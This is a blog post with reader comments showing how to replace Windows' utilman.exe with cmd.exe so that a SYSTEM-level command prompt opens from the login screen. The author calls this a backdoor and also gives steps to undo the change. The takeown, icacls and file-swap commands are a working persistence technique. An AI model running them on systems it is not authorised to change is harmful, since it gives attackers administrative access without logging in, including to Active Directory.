Cyber Security

Utilman.exe and the Security Concern (Administering the system without logging in)

On every windows system there is a small but useful feature called Ease of access. If you want a high-contrast theme, optimized visual display or closed captions, then “Ease of access” is your friend. You can start it without logging in. This article describes how to use utilman.exe to create a backdoor to your System. At the end of the article we will restore the default settings.

What´s in this article?

If you want to configure your system to look like this, then continue reading … Pay attention to the background. I am not logged in and can run cmd with administrative rights … This works on Windows 10 and Windows Server …Unbenannt

Utilman.exe

The file with which you can start Ease of Access is called utilman.exe. You can find it in C:\Windows\System32. But now we come across a problem. We have to modify the file, because it´s restricted to system accounts only. So, we have to take ownership and grant full access to the administator account. Open Windows PowerShell with administrative rights. Pay attention to the grant parameter in the second command. You have to provide your username there. If necessary, replace administrator with the name of your user account, which must be a member of the local administrators group.

takeown /f $env:windir\system32\utilman.exe

icacls $env:windir\system32\utilman.exe /grant "$($env:username):F"
Unbenannt.PNG

Now we rename it to utilman2.exe. Then we copy cmd and call it utilman.exe 😉

Rename-Item $env:windir\system32\utilman.exe $env:windir\system32\utilman2.exe

Copy-Item $env:windir\system32\cmd.exe $env:windir\system32\utilman.exe

What has happend now? We now have a new file called utilman.exe. But this file will not run Ease of Access. It will run cmd.

Testing the configuration

Now log off. Click on the icon in the lower right corner. This is Ease of Success.

Unbenannt.PNG

But now it´s cmd. You are able to configure your system without logging in.

Unbenannt.PNG

If you do this on a Domain Controller, feel free to start PowerShell and run Get-ADUser. 😉 Note: An attacker can now administer your Active Directory Domain.

Unbenannt.PNG

Or open dsa.msc to administer Active Directory.

Unbenannt.PNG

Undo Changes

You should undo the changes you have made. Delete c:\windows\system32\utilman.exe (which currently opens cmd) and rename c:\windows\system32\utilman2.exe to utilman.exe to restore the default settings.

Further thoughts

Is the possibility to rename utilman and change it to cmd a security issue? The answer is not easy. Utilman.exe is a protected file. You have to take ownership to go for it. What do you think?

4 replies »

  1. The whole article is misleading. This is really not good to play with. It’s something you can use to reset user password if you don’t know it but it should be put back as it was before. It’s a huge security issue and administering any system using this way is asking for trouble.

    Like

    • Hi Przemyslaw!

      Thank you for your comment and your advice.

      I agree. Some elements are a little missleading. I have changed some things to make clear, that you should undo the changes we´ve made in the article.

      Regards,
      P

      Like

  2. Yes it is a security issue if you leave this as a permanent feature if it is temp and you you put the original app back when your done then no , by the way this hole has been around since Vista. …

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.